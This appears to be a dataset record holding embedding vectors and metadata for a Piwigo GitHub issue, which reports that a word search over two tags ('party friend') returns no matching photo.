-0.020868338644504547, 0.004063834436237812, -0.0016072934959083796, 0.015188384801149368, 0.02105662412941456, -0.005585810635238886, -0.011752169579267502, -0.012874038890004158, -0.0013768395874649286, -0.017306599766016006, -0.008567001670598984, 0.0051425546407699585, 0.01688295602798462, 0.00822181161493063, -0.01838924176990986, 0.014262646436691284, -0.02345726639032364, -0.002871357835829258, 0.015870919451117516, -0.020664362236857414, -0.03527219966053963, -0.023802457377314568, -0.013203538954257965, -0.010073288343846798, -0.005515203811228275, 0.01619257591664791, -0.009492740035057068, 0.004962114151567221, 0.014905955642461777, -0.012332716956734657, -0.012152276933193207, 0.005319072864949703, 0.018624600023031235, 0.02124490961432457, -0.007292150519788265, 0.009971300140023232, 0.022076504305005074, -0.0007139168446883559, 0.005028798710554838, 0.0070411027409136295, 0.014529384672641754, 0.01912669464945793, -0.010928419418632984, 0.01609843224287033, -0.008747442625463009, 0.0094613591209054, 0.0008909250609576702, 0.013470277190208435, -0.008417942561209202, 0.013211384415626526, -0.002737988717854023, 0.007252924144268036, 0.0054720547050237656, -0.010873502120375633, -0.017118314281105995, 0.03740610554814339, -0.002967461943626404, -0.006284037139266729, -0.032039958983659744, -0.00790800154209137, -0.008912192657589912, -0.03429938852787018, 0.001036552363075316, -0.01435678917914629, 0.022908100858330727, 0.007511817384511232, 0.03850443661212921, 0.011226538568735123, -0.003353839972987771, 0.0035833134315907955, 0.006597846746444702, 0.02221771888434887, -0.016914337873458862, 0.006562543101608753, -0.015572801232337952, -0.010951954871416092, -0.027270054444670677, 0.012717134319245815, 0.007327454164624214, 0.0019868069794028997, 0.0037284502759575844, 0.0081825852394104, 0.007892311550676823, -0.019236527383327484, 0.003018456045538187, 0.010285109281539917, -0.0003530358080752194, 0.001645539072342217, 0.005130786914378405, 0.012215038761496544, -0.005978072993457317, 0.013901765458285809, 0.00968887098133564, 0.013321217149496078, 0.007190162315964699, 0.013878229074180126, -0.030690578743815422, 0.015980754047632217, 0.013689943589270115, -0.0034774024970829487, -0.022421695291996002, -0.011171621270477772, -0.0025830452796071768, 0.025214601308107376, -0.0019446387887001038, 0.00068596814526245, 0.018373552709817886, -0.02152733877301216, -0.02381814830005169, 0.0025242059491574764, -0.004326649941504002, 0.012379788793623447, 0.01480396743863821, -0.01955033838748932, -0.0002096149983117357, -0.008292418904602528, -0.013219228945672512, 0.020381933078169823 ]
null
null
null
null
null
null
null
null
null
[ "Piwigo", "Piwigo" ]
If a photo is tagged "party" and "friend", if you search "party friend" the photo won't be in the results.
[search 14.x] search by word on 2 words matching tags gives no result
https://api.github.com/repos/Piwigo/Piwigo/issues/2136/comments
0
2024-03-17T17:21:23
2024-04-10T15:13:01Z
https://github.com/Piwigo/Piwigo/issues/2136
2,190,772,570
2,136
false
This is a GitHub Issue repo:Piwigo owner:Piwigo Title : [search 14.x] search by word on 2 words matching tags gives no result Issue date: --- start body --- If a photo is tagged "party" and "friend", if you search "party friend" the photo won't be in the results. --- end body ---
282
[ -0.01564398594200611, 0.04093229025602341, -0.006598930340260267, 0.016989704221487045, 0.0017829026328399777, 0.021994097158312798, -0.020003555342555046, 0.04962339624762535, -0.024096783250570297, 0.0019852861296385527, -0.0059821424074471, 0.006760136224329472, -0.02169972099363804, 0.005516046658158302, -0.044661056250333786, 0.024194909259676933, -0.04039961099624634, 0.016793454065918922, -0.0023515040520578623, -0.01913444511592388, -0.053492337465286255, -0.0046995035372674465, 0.015629967674613, 0.01223763357847929, 0.018433548510074615, 0.007857037708163261, -0.012861430644989014, 0.01499916147440672, -0.02988618053495884, 0.03182065114378929, 0.026185452938079834, -0.0036726919934153557, -0.01696166954934597, 0.01371652353554964, 0.04289479926228523, -0.02123713120818138, 0.02226043865084648, 0.03885764256119728, -0.028414299711585045, 0.01955498196184635, 0.004934303462505341, -0.012812367640435696, -0.029493678361177444, -0.023045441135764122, -0.02988618053495884, 0.026900365948677063, -0.02237258106470108, 0.01791488565504551, -0.02687232941389084, -0.035633523017168045, 0.03995103761553764, -0.005575622897595167, -0.007429491262882948, 0.015952378511428833, -0.024068748578429222, -0.0187559612095356, 0.05551091581583023, -0.011088165454566479, -0.031904757022857666, 0.043455515056848526, 0.008761192671954632, 0.010562493465840816, -0.0032977128867059946, -0.0013352057430893183, -0.013366075232625008, 0.029802072793245316, -0.02904510498046875, 0.022526778280735016, -0.017213990911841393, -0.007121097296476364, 0.03655870258808136, 0.01059053000062704, 0.02663402445614338, 0.01187316793948412, 0.013218887150287628, -0.029633857309818268, 0.009630302898585796, 0.01164187304675579, -0.010898923501372337, -0.009784500114619732, -0.03218511864542961, 0.013548308052122593, -0.012307723052799702, 0.03482048213481903, -0.009399007074534893, 0.014522552490234375, 0.010029813274741173, -0.06442630290985107, -0.021615615114569664, 0.01888212189078331, -0.03313833475112915, -0.024433214217424393, 0.0004538297653198242, -0.01714390143752098, 0.020704450085759163, 0.01811113767325878, 0.0065463632345199585, 0.01289647538214922, -0.018363459035754204, -0.0009243058157153428, -0.03198886662721634, -0.0411565788090229, -0.01942882128059864, 0.010268117301166058, 0.04233408346772194, 0.01853167451918125, -0.014368356205523014, -0.02279311791062355, 0.011950266547501087, 0.0828738734126091, 0.053604479879140854, 0.002272653393447399, -0.04485730454325676, -0.0119642848148942, -0.0002937189710792154, 0.05733324587345123, 0.0007503961678594351, -0.009363962337374687, -0.0014964117435738444, 0.015069250948727131, 0.0002965663734357804, -0.03560548648238182, -0.016246754676103592, 0.024923840537667274, -0.0006343103596009314, -0.0007578431395813823, -0.021811865270137787, 0.01725604571402073, -0.053856801241636276, -0.0006251111044548452, -0.009637312032282352, -0.042782656848430634, 0.020017573609948158, 0.004559324588626623, 0.018601763993501663, 0.0024496293626725674, -0.018433548510074615, 0.009420034475624561, -0.028288139030337334, -0.014116033911705017, -0.01635889895260334, -0.027517152950167656, 0.001876647467724979, -0.014901036396622658, -0.040259432047605515, 0.0011415834305807948, -0.029689928516745567, -0.011571783572435379, 0.02687232941389084, 0.017270062118768692, 0.03543727099895477, -0.05909949913620949, 0.007632751017808914, 0.017704617232084274, 0.017452295869588852, 0.0072893123142421246, 0.02628357708454132, -0.025666790083050728, -0.012917501851916313, 0.011116201058030128, -0.019512927159667015, -0.04042764753103256, 0.04715624451637268, 0.01630282774567604, -0.015083269216120243, -0.005270733498036861, -0.023648211732506752, 0.017396224662661552, 0.011389550752937794, 0.025835003703832626, 0.0034484053030610085, -0.03661477565765381, 0.013295985758304596, 0.002952521899715066, -0.03476441279053688, -0.011543747037649155, -0.010485394857823849, 0.016386935487389565, -0.03835299611091614, -0.0003600850177463144, -0.03041885979473591, 0.0018363459967076778, -0.010450350120663643, -0.01815319061279297, 0.0031575337052345276, -0.04878231883049011, 0.008880345150828362, 0.027951708063483238, 0.025877058506011963, 0.02273704670369625, 0.002623100997880101, 0.015952378511428833, 0.03254958242177963, -0.03613816574215889, 0.015055233612656593, -0.006735604722052813, -0.05105322226881981, -0.013267950154840946, 0.01617666520178318, -0.028246084228157997, 0.07558456063270569, -0.02513410896062851, -0.01286843977868557, -0.01785881444811821, 0.023620175197720528, 0.04911874979734421, -0.008992488496005535, 0.056267883628606796, -0.019933465868234634, -0.032016903162002563, -0.020522218197584152, -0.0004897506441920996, 0.0004426592495292425, 0.04247426241636276, -0.012272678315639496, 0.02622750587761402, -0.00128176249563694, 0.001899426570162177, 0.0001045867393258959, 0.017606493085622787, -0.008221503347158432, -0.03218511864542961, -0.027194742113351822, 0.007990207523107529, 0.020830610767006874, -0.028736712411046028, -0.018657835200428963, -0.022807136178016663, -0.011137227527797222, 0.007205204572528601, 0.01804104819893837, -0.02957778610289097, 0.011585800908505917, 0.028007781133055687, 0.006094285752624273, 0.0023988145403563976, -0.02332579903304577, -0.01382866594940424, 0.004131778609007597, -0.004405127838253975, 0.02856849692761898, 0.0015787668526172638, 0.0009830058552324772, -0.003925014287233353, 0.045305877923965454, 0.057697709649801254, -0.02482571452856064, -0.04236212000250816, -0.05279144272208214, 0.010990040376782417, 0.0014342071954160929, 0.010576511733233929, -0.017003722488880157, 0.01792890392243862, -0.010022804141044617, 0.03664281219244003, 0.009630302898585796, -0.006791676394641399, -0.02176981046795845, -0.018475603312253952, 0.022288473322987556, 0.024685535579919815, -0.033474765717983246, 0.019260605797171593, 0.0372876338660717, 0.004576846957206726, 0.011046111583709717, -0.032269224524497986, 0.039670679718256, -0.0027737936470657587, -0.01028213556855917, -0.03832495957612991, -0.01857372745871544, -0.008284583687782288, -0.035325128585100174, -0.003422121750190854, -0.013695496134459972, 0.004545306786894798, 0.02441919595003128, -0.01888212189078331, -0.039053890854120255, 0.04264247789978981, -0.015672020614147186, -0.0020466146524995565, 0.02357812225818634, 0.0017259549349546432, -0.017900869250297546, 0.009588249027729034, -0.004068697802722454, 0.017270062118768692, -0.012672188691794872, 0.0022831668611615896, -0.06330487132072449, -0.009069586172699928, 0.0013790116645395756, 0.030811361968517303, 0.025905095040798187, 0.026003219187259674, 0.017998993396759033, 0.024489285424351692, 0.0035272561945021152, 0.0052742380648851395, -0.023143567144870758, -0.02098480798304081, -0.0028614054899662733, 0.030446896329522133, 0.039306215941905975, 0.045137662440538406, -0.02849840745329857, -0.03711942210793495, 0.005596649833023548, -0.022947315126657486, 0.017031759023666382, 0.019625071436166763, 0.01919051632285118, 0.0031557816546410322, -0.002032596617937088, 0.009518159553408623, 0.012707233428955078, -0.053604479879140854, -0.016330862417817116, -0.008494852110743523, 0.0028596532065421343, -0.011074147187173367, 0.01232875045388937, -0.01371652353554964, -0.003714745631441474, -0.008116369135677814, 0.008859317749738693, -0.005649216938763857, -0.003914501052349806, -0.039782822132110596, 0.008880345150828362, 0.0030243636574596167, -0.005116536282002926, -0.04541802406311035, -0.008845300413668156, 0.011291424743831158, 0.046034809201955795, -0.0005261095939204097, 0.0018696384504437447, 0.06078165024518967, -0.016807472333312035, 0.017452295869588852, 0.041100505739450455, -0.022526778280735016, -0.0033292530570179224, 0.022106241434812546, 0.040035147219896317, -0.03793245926499367, 0.0006566513911820948, -0.026549918577075005, -0.030923504382371902, 0.040147289633750916, -0.0312038641422987, -0.03504477068781853, -0.013702505268156528, -0.008515879511833191, 0.02043811045587063, -0.006539354100823402, -0.0070054493844509125, -0.0558193102478981, 0.007040494121611118, 0.002971796551719308, 0.022891243919730186, 0.019470874220132828, 0.02249874174594879, -0.0020764025393873453, -0.033530835062265396, -0.020480163395404816, 0.003087444230914116, 0.04247426241636276, -0.03291404992341995, 0.00593658396974206, -0.04984768107533455, 0.027348939329385757, 0.0018293369794264436, 0.0009041550802066922, 0.01564398594200611, -0.009006505832076073, -0.0020396055188030005, 0.03462423384189606, 0.013989872299134731, -0.03470833972096443, 0.0026704114861786366, 0.00488524092361331, 0.013197860680520535, 0.007716858293861151, 0.02640973962843418, -0.0455862358212471, -0.048081424087285995, 0.03392333909869194, -0.006339598912745714, -0.0395585373044014, 0.012672188691794872, 0.026479829102754593, -0.060052718967199326, -0.02111096866428852, -0.03734370693564415, -0.015125323086977005, 0.03078332543373108, -0.033586908131837845, 0.0036411515902727842, 0.00019953616720158607, -0.0031137277837842703, -0.0018801519181579351, 0.01804104819893837, -0.031652435660362244, 0.007702840492129326, 0.027979744598269463, -0.03235333040356636, 0.03266172483563423, -0.03221315145492554, 0.008025252260267735, -0.0018065578769892454, 0.00016646266158204526, 0.052342869341373444, 0.01857372745871544, -0.0026160920970141888, 0.01564398594200611, -0.0208025760948658, 0.008501861244440079, -0.007576679345220327, -0.007688822690397501, -0.04468909278512001, -0.02104087918996811, -0.023676246404647827, 0.020129716023802757, 0.0331944078207016, -0.0218258835375309, -0.002873671241104603, 0.007415473461151123, -0.0052251750603318214, -0.023830443620681763, 0.007268285378813744, -0.015798183158040047, -0.011782051995396614, 0.01822328008711338, 0.007618733216077089, -0.00747154513373971, -0.028414299711585045, 0.024685535579919815, -0.04208175837993622, -0.01792890392243862, 0.022652938961982727, -0.0015200668713077903, -0.03423172980546951, 0.012048391625285149, 0.03193279355764389, 0.01257406361401081, 0.04732445627450943, -0.01067463681101799, -0.05189429596066475, -0.03560548648238182, 0.0026896861381828785, 0.01070267241448164, -0.002696695039048791, 0.0006273014005273581, 0.00974244624376297, 0.028133941814303398, -0.0177326537668705, -0.03344672918319702, 0.007997216656804085, -0.02219034917652607, 0.04732445627450943, -0.012812367640435696, -0.020886683836579323, 0.010983031243085861, 0.01331701222807169, -0.018910158425569534, -0.007569670211523771, -0.004892250057309866, 0.02363419346511364, 0.014830946922302246, -0.04118461534380913, 0.012454911135137081, -0.051810190081596375, 0.012567054480314255, 0.009763472713530064, -0.00020227403729222715, -0.012931520119309425, -0.03560548648238182, -0.00009314242925029248, 0.02640973962843418, 0.04575445130467415, 0.007096565794199705, 0.018265334889292717, -0.022358562797307968, 0.007247258443385363, 0.04805338755249977, 0.003036629408597946, 0.03507280722260475, -0.021489452570676804, -0.005677253007888794, -0.022526778280735016, 0.0197792686522007, -0.030166538432240486, -0.035521380603313446, 0.017956940457224846, -0.0072893123142421246, 0.04502552002668381, -0.02062034234404564, 0.009973742067813873, -0.004485730547457933, 0.01792890392243862, -0.023255709558725357, -0.01428424846380949, 0.013373084366321564, 0.017718635499477386, 0.02754518948495388, -0.010057848878204823, -0.0350167341530323, -0.020129716023802757, -0.055230557918548584, -0.009469096548855305, 0.005792900454252958, 0.0333065502345562, -0.008368691429495811, 0.016611220315098763, -0.023381870239973068, -0.004478721413761377, -0.010786780156195164, -0.0029279906302690506, -0.0003495715791359544, -0.012468929402530193, 0.006704064551740885, -0.002838626503944397, 0.01617666520178318, -0.016316844150424004, -0.054445553570985794, -0.032325297594070435, -0.01738220639526844, 0.03669888153672218, 0.018447566777467728, 0.005211157258599997, 0.023494014516472816, -0.020942755043506622, 0.016919614747166634, 0.008642040193080902, -0.048558034002780914, -0.025456521660089493, 0.02670411579310894, -0.03336261957883835, 0.009391998872160912, 0.015531842596828938, -0.013667460530996323, 0.0006132834823802114, -0.01343616470694542, -0.042418189346790314, -0.0032013398595154285, -0.001408799784258008, 0.0145505890250206, 0.035689592361450195, 0.003599097952246666, 0.0008752431604079902, 0.013450182974338531, 0.031119756400585175, 0.052651263773441315, 0.0416051521897316, -0.015083269216120243, 0.0177326537668705, 0.03661477565765381, 0.009104630909860134, -0.024671519175171852, -0.0032346323132514954, -0.01223763357847929, -0.00017642851162236184, -0.012167544104158878, -0.010548476129770279, -0.010387269780039787, 0.036530669778585434, -0.0023550086189061403, -0.026381703093647957, -0.012510983273386955, -0.005361849907785654, 0.03291404992341995, 0.024503303691744804, 0.0057158018462359905, -0.015055233612656593, -0.010001777671277523, 0.01536362711340189, 0.0018153190612792969, -0.04163318872451782, 0.007015963084995747, 0.006164375226944685, -0.01666729338467121, 0.027461081743240356, -0.003967068158090115, -0.04718427732586861, -0.015167376957833767, -0.009342935867607594, 0.025302324444055557, 0.007758912164717913, -0.005649216938763857, 0.02957778610289097, -0.012637143954634666, -0.009363962337374687, -0.011011066846549511, 0.04499748349189758, -0.02213427610695362, -0.022526778280735016, 0.027376974001526833, 0.021153023466467857, -0.004804638214409351, 0.014494516886770725, 0.009966732934117317, 0.02429303526878357, 0.019036319106817245, 0.015349609777331352, 0.03299815580248833, -0.008095341734588146, 0.01834944076836109, 0.01190120354294777, -0.030334753915667534, 0.01389174722135067, 0.03498869761824608, 0.0068021900951862335, -0.018924176692962646, -0.029185283929109573, 0.010191019624471664, 0.018924176692962646, -0.03675495460629463, 0.00007173226185841486, -0.0018836563685908914, -0.0433153361082077, 0.02015775255858898, 0.004145796410739422, 0.003683205461129546, -0.003970572259277105, -0.006767145358026028, -0.008536905981600285, 0.01157879177480936, 0.015433716587722301, -0.0313720777630806, -0.010548476129770279, -0.022709012031555176, 0.0015962893376126885, 0.028007781133055687, 0.012286696583032608, -0.018503637984395027, -0.021391328424215317, -0.004405127838253975, 0.017213990911841393, 0.03282994031906128, -0.0024951875675469637, -0.012945538386702538, 0.0014815176837146282, -0.030502967536449432, 0.031540293246507645, 0.02580696903169155, -0.011179281398653984, 0.0016181922983378172, 0.03709138557314873, -0.004927294794470072, 0.04407230392098427, -0.018055066466331482, 0.003579823300242424, 0.06246379762887955, -0.005838458891957998, 0.005169103387743235, 0.01413706038147211, -0.012300713919103146, -0.01028213556855917, 0.01491505466401577, 0.009658338502049446, 0.024937858805060387, 0.021096952259540558, -0.006171383894979954, -0.009483114816248417, 0.035269055515527725, 0.04480123519897461, -0.022092223167419434, -0.017003722488880157, -0.043567657470703125, -0.004156309645622969, 0.005859485361725092, -0.0031137277837842703, 0.012980583123862743, -0.03470833972096443, -0.010947986505925655, -0.006679533049464226, 0.0023339816834777594, -0.02105489745736122, -0.0372876338660717, 0.0018783996347337961, 0.0022568833082914352, -0.005333813838660717, 0.004201868083328009, 0.006984422914683819, -0.018447566777467728, -0.018910158425569534, -0.016807472333312035, -0.017900869250297546, 0.027012508362531662, 0.0029227337799966335, -0.007212213706225157, 0.01919051632285118, 0.02621348761022091, -0.02573687955737114, 0.015896307304501534, -0.02869465760886669, -0.007359401788562536, -0.005912052933126688, -0.01769060082733631, -0.0038093666080385447, 0.008628022857010365, -0.009553204290568829, 0.014788893051445484, -0.002973548835143447, 0.003718250198289752, -0.007632751017808914, 0.010478386655449867, -0.017185956239700317, 0.02628357708454132, -0.003560548648238182, -0.006935359910130501, 0.009721418842673302, -0.006195915397256613, -0.01846158504486084, 0.01935873180627823, -0.015672020614147186, -0.016569167375564575, -0.020354002714157104, -0.0003966630029026419, -0.009104630909860134, 0.0028859367594122887, 0.024489285424351692, 0.020045608282089233, 0.0012265669647604227, 0.023045441135764122, -0.05573520436882973, 0.01416509598493576, -0.008740165270864964, 0.007520607672631741, -0.02482571452856064, 0.01792890392243862, 0.0047170259058475494, -0.023017404600977898, -0.0023795398883521557, -0.016372917219996452, -0.023199638351798058, -0.007821992971003056, -0.02586304023861885, -0.003185569541528821, -0.0024338592775166035, 0.019260605797171593, -0.01064660120755434, -0.012342767789959908, -0.003110223449766636, -0.0039565544575452805, 0.010408297181129456, -0.014249203726649284, -0.007927127182483673, -0.033951371908187866, -0.0011556013487279415, -0.03067118301987648, 0.016877561807632446, -0.03218511864542961, 0.013996881432831287, -0.029241356998682022, 0.032269224524497986, -0.02308749407529831, 0.021012844517827034, 0.059211645275354385, 0.02127918414771557, -0.004173832014203072, -0.0032819428015500307, -0.0004809894599020481, 0.0013054177397862077, -0.013898755423724651, 0.0032819428015500307, -0.026255542412400246, -0.015629967674613, 0.0020764025393873453, -0.03927817940711975, -0.01792890392243862, 0.004937808029353619, 0.00028342456789687276, -0.03156832978129387, 0.013338039629161358, -0.031484220176935196, -0.006875784136354923, -0.011824105866253376, 0.028526442125439644, -0.00715614203363657, 0.001389525132253766, 0.02514812722802162, 0.01857372745871544, 0.028119923546910286, -0.027979744598269463, -0.00844579003751278, -0.0017504863208159804, 0.005705288611352444, -0.005866494495421648, 0.04965142905712128, -0.01362540666013956, 0.024250980466604233, -0.007212213706225157, -0.003711241064593196, -0.01893819309771061, -0.027194742113351822, 0.005403903778642416, 0.013239914551377296, -0.0067776585929095745, -0.03425976634025574, -0.01157879177480936, -0.009665347635746002, 0.03896978497505188, 0.012251651845872402, 0.0165972039103508, 0.004457694943994284, -0.014017907902598381, 0.019681142643094063, -0.009812535718083382, 0.006640983745455742, 0.03187672421336174, -0.018139172345399857, -0.0021272175945341587, -0.014382373541593552, -0.02158757857978344, 0.000034086515370290726, 0.012861430644989014, -0.003560548648238182, -0.028161976486444473, 0.020480163395404816, -0.04118461534380913, 0.0014788892585784197, 0.01247593853622675, 0.01413706038147211, 0.015195412561297417, -0.00010754363756859675, -0.011200308799743652, -0.010148965753614902, 0.01247593853622675, -0.022512760013341904, -0.007716858293861151, 0.03218511864542961, -0.009216774255037308, -0.016386935487389565, 0.05094107985496521, 0.006921342108398676, -0.009251818992197514, -0.05004393309354782, -0.008754183538258076, 0.015615949407219887, -0.018868103623390198, -0.028456352651119232, 0.011627854779362679, 0.002067641355097294, 0.04093229025602341, -0.0004823036433663219, 0.010085884481668472, -0.005712297745049, 0.029157249256968498, -0.009188738651573658, 0.0005410036537796259, 0.0052076526917517185, 0.033054228872060776, -0.004759079776704311, 0.002384796505793929, 0.016246754676103592, -0.018896140158176422, -0.031904757022857666, 0.0075416346080601215, -0.013758576475083828, -0.05021214857697487, -0.008522887714207172, -0.018475603312253952, -0.01923256926238537, 0.005498524289578199, -0.01218156237155199, -0.03103564865887165, 0.030026359483599663, 0.01184513233602047, 0.016274791210889816, 0.014130051247775555, 0.011536737903952599, -0.0330822616815567, 0.0036446561571210623, -0.01750836707651615, -0.03288601338863373, 0.0010487147374078631, -0.035269055515527725, -0.023409906774759293, 0.0167093463242054, -0.024573393166065216, 0.03204493969678879, 0.012111472897231579, 0.017830779775977135, -0.022120259702205658, 0.010099902749061584, -0.030559038743376732, 0.0020588801708072424, -0.03807263821363449, 0.01623273827135563, -0.01648505963385105, -0.02820403128862381, -0.03807263821363449, -0.00603120494633913, 0.004019635263830423, 0.0016444758512079716, -0.014017907902598381, -0.03041885979473591, -0.010008786804974079, -0.0057613602839410305, 0.008985479362308979, 0.008067306131124496, 0.003458918770775199, 0.03801656514406204, 0.033642981201410294, 0.026479829102754593, -0.0007157894433476031, -0.03386726602911949, 0.018980247899889946, -0.011704953387379646, -0.017480330541729927, -0.024629464372992516, -0.0075836884789168835, -0.012020356021821499, 0.019919447600841522, 0.006788171827793121, 0.011088165454566479, -0.006823216564953327, 0.024965893477201462, 0.01257406361401081, -0.0015866520116105676, 0.0031452681869268417, 0.023241691291332245, -0.002404071157798171, -0.00817944947630167, 0.0031417636200785637, -0.0030611606780439615, 0.010604547336697578, 0.01979328691959381, 0.004433163441717625, -0.018812032416462898, 0.015041215345263481, -0.035156913101673126, 0.005035933572798967, -0.035577449947595596, 0.015055233612656593, 0.016751399263739586, 0.02460142783820629, -0.036362454295158386, 0.030166538432240486, -0.0060101780109107494, -0.004478721413761377, -0.007962171919643879, 0.00605924054980278, 0.022526778280735016, 0.006055736448615789, 0.006725091487169266, -0.007653777953237295, -0.026143398135900497, -0.008431771770119667, 0.02940957061946392, -0.038633354008197784, -0.0312038641422987, 0.005495020188391209, 0.011985311284661293, 0.002090420573949814, 0.023073475807905197, -0.01654113084077835, -0.002342742867767811, 0.004086220171302557, 0.03992300108075142, -0.021797847002744675, 0.020129716023802757, 0.0009427043260075152, 0.021433381363749504, 0.011803078465163708, 0.018419532105326653, 0.020059626549482346, 0.005042942240834236, 0.014957107603549957, 0.03103564865887165, -0.037259601056575775, -0.004394614137709141, -0.00979851745069027, -0.007927127182483673, -0.013120762072503567, 0.00031167943961918354, 0.011718970723450184, -0.016863543540239334, 0.015475770458579063, -0.04082014784216881, 0.0011266893707215786, 0.02826010249555111, -0.026423756033182144, -0.02067641355097294, 0.02952171489596367, -0.0036306381225585938, -0.0059926556423306465, -0.025820987299084663, 0.00205187126994133, -0.020844629034399986, -0.01683550700545311, -0.0026336144655942917, 0.01774667203426361, -0.00481164688244462, -0.05214661732316017, 0.005978637840598822, -0.004920285660773516, -0.01948489248752594, -0.021685704588890076, 0.035633523017168045, -0.024096783250570297, 0.013849693350493908, -0.002053623553365469, 0.005333813838660717, 0.034736376255750656, 0.05094107985496521, 0.023423925042152405, -0.011880177073180676, -0.015041215345263481, -0.029605822637677193, -0.005330309737473726, -0.01391978282481432, 0.012419866397976875, 0.005379372276365757, -0.008417753502726555, -0.015237466432154179, -0.033474765717983246, 0.030222609639167786, 0.004352560266852379, 0.01630282774567604, -0.015167376957833767, 0.015924343839287758, 0.03151225671172142, 0.014788893051445484, 0.021139005199074745, -0.010962003841996193, 0.010057848878204823, 0.004110751673579216, -0.01996150054037571, -0.02723679505288601, -0.010779771022498608, -0.025035982951521873, -0.02176981046795845, 0.0007355021080002189, 0.019821321591734886, -0.0030576561111956835, -0.004555820021778345, -0.01919051632285118, -0.0027264831587672234, -0.006353616714477539, -0.004268452990800142, 0.025638753548264503, 0.012798350304365158, -0.015181394293904305, -0.005060464609414339, 0.001018050592392683, 0.03266172483563423, 0.012581072747707367, -0.006973909214138985, 0.0015892803203314543, 0.011543747037649155, -0.037736207246780396, -0.004394614137709141, 0.026970455422997475, 0.009609276428818703, -0.00527774216607213, -0.008382708765566349, -0.0026266055647283792, -0.0014964117435738444, -0.026746168732643127, 0.016877561807632446, 0.0014639953151345253, -0.013506254181265831, -0.032325297594070435, -0.009875616058707237, 0.03877353295683861, -0.002482922049239278, 0.018055066466331482, -0.0030839398968964815, -0.03425976634025574, 0.017998993396759033, -0.008649049326777458, 0.016386935487389565, -0.007317347917705774, -0.0012248146813362837, -0.025989200919866562, -0.004110751673579216, -0.0047660889104008675, 0.0014455968048423529, 0.003700727829709649, -0.01033820677548647, -0.02645179256796837, 0.024923840537667274, -0.010520439594984055, -0.012819376774132252, 0.011880177073180676, -0.01811113767325878, 0.010611556470394135, -0.004899258725345135, -0.006020691711455584, 0.01719997264444828, 0.042306046932935715, 0.024489285424351692, -0.007597706280648708, 0.016386935487389565, 0.004759079776704311, 0.002507453318685293, 0.004871223121881485, -0.01913444511592388, -0.006560381036251783, -0.01025409996509552, 0.03025064617395401, -0.0005278618773445487, -0.0015445982571691275, -0.013905764557421207, 0.029661893844604492, -0.001957250526174903, -0.005796405021101236, 0.021980080753564835, 0.03644656017422676, 0.024433214217424393, -0.006437724456191063, 0.026353666558861732, 0.026507863774895668, -0.012539018876850605, -0.00011991882638540119, 0.01791488565504551, -0.00823552068322897, 0.025835003703832626, 0.007829002104699612, 0.019989537075161934, 0.005025419872254133, -0.018013011664152145, -0.02332579903304577, -0.01846158504486084, -0.017228009179234505, -0.017998993396759033, 0.0055300649255514145, 0.01564398594200611, -0.0024023191072046757, -0.00657089427113533, 0.01184513233602047, -0.024755625054240227, -0.008228512480854988, -0.016330862417817116, 0.009490123949944973, -0.019036319106817245, 0.005912052933126688, -0.005221670959144831, -0.04373587295413017, 0.009847580455243587, -0.007604714948683977, -0.026185452938079834, 0.00011132190411444753, 0.017662564292550087, -0.0015113056870177388, 0.003735772566869855, 0.03193279355764389, 0.013912773691117764, -0.002346247434616089, 0.015279519371688366, -0.010155973955988884, -0.013765585608780384, 0.025582682341337204, 0.02200811542570591, 0.015139340423047543, 0.001350975944660604, -0.005176112521439791, 0.001054847612977028, -0.0070545123890042305, -0.022274455055594444, -0.008242529816925526, 0.0028456354048103094, 0.001741725136525929, -0.016022469848394394, -0.0024759129155427217, 0.03784835338592529, 0.0032801905181258917, 0.03221315145492554, 0.01564398594200611, 0.0009076595306396484, -0.03425976634025574, 0.02405473031103611, -0.010043831542134285, -0.0032118530943989754, -0.004752070643007755, 0.021082933992147446, -0.024741608649492264, 0.00043411710066720843, -0.022358562797307968, -0.012595090083777905, -0.004342047031968832, 0.004363073967397213, 0.01575612835586071, -0.01028213556855917, 0.047296423465013504, 0.01599443331360817, 0.01937274821102619, 0.009728427976369858, -0.024489285424351692, 0.0016392191173508763, 0.014291257597506046, 0.006329085677862167, -0.020424092188477516, -0.0032171099446713924, -0.0417172946035862, 0.00240582344122231, -0.0016041743801906705, 0.005677253007888794, 0.01338009350001812, -0.006910828873515129, -0.0416051521897316, 0.009069586172699928, -0.011473657563328743, -0.011368523351848125, -0.025358395650982857, 0.0039390320889651775, -0.005855981260538101, -0.0034694322384893894, -0.0022796622943133116, 0.002919229445978999, 0.0023147070314735174, -0.01857372745871544, 0.013975854031741619, -0.02206418663263321, -0.009321908466517925, 0.0022095728199929, -0.01497112587094307, -0.026255542412400246, 0.034848518669605255, -0.0017653802642598748, 0.01617666520178318, -0.03235333040356636, 0.008824273012578487, -0.006942369043827057, 0.01900828257203102, -0.02025587670505047, -0.00974244624376297, -0.040203358978033066, 0.020942755043506622, -0.019022300839424133, -0.008564941585063934, 0.024559374898672104, 0.03908192738890648, 0.018363459035754204, 0.006097789853811264, -0.028820818290114403, -0.0023357339669018984, -0.024012677371501923, -0.014010898768901825, -0.003010345855727792, -0.0561557412147522, -0.010219055227935314, 0.01738220639526844, 0.001645351992920041, 0.00630104960873723, -0.00871913880109787, -0.005032429005950689, -0.01241285726428032, 0.009826553985476494, 0.013401119969785213, -0.005617676768451929, -0.005120040848851204, 0.00886632688343525, -0.017228009179234505, -0.01277732290327549, 0.013464200310409069, 0.021489452570676804, -0.014536570757627487, -0.02712465263903141, 0.010233072564005852, 0.009658338502049446, -0.00784301944077015, 0.015924343839287758, -0.0025722861755639315, -0.018181227147579193, 0.00688629737123847, 0.007015963084995747, 0.03198886662721634, -0.02374633587896824, -0.005438948515802622, 0.009160703048110008, -0.007829002104699612, -0.026858311146497726, -0.0007149133016355336, 0.0218258835375309, -0.0026108354795724154, 0.028736712411046028, -0.023353835567831993, -0.04222193732857704, 0.006760136224329472, 0.012532009743154049, 0.0067321001552045345, 0.009945705533027649, -0.011004057712852955, -0.018251316621899605, -0.0260312557220459, -0.015111304819583893, -0.0011766281677410007, 0.012216607108712196, 0.011522720567882061, 0.01136151421815157, 0.008606995455920696, 0.017213990911841393, 0.004681981168687344, 0.0125039741396904, -0.0330822616815567, 0.007716858293861151, -0.00794114451855421, -0.018896140158176422, 0.03462423384189606, 0.008992488496005535, -0.021096952259540558, 0.004892250057309866, -0.004674972500652075, -0.007618733216077089, -0.031904757022857666, -0.002521471120417118, -0.0067496225237846375, 0.005708793178200722, 0.02526026964187622, -0.007807974703609943, -0.010148965753614902, -0.009938696399331093, -0.03277387097477913, -0.012532009743154049, -0.0075346254743635654, 0.0009549699607305229, -0.034427981823682785, -0.004822160582989454, 0.008494852110743523, -0.021685704588890076, 0.004545306786894798, -0.015111304819583893, 0.0060347095131874084, -0.009637312032282352, 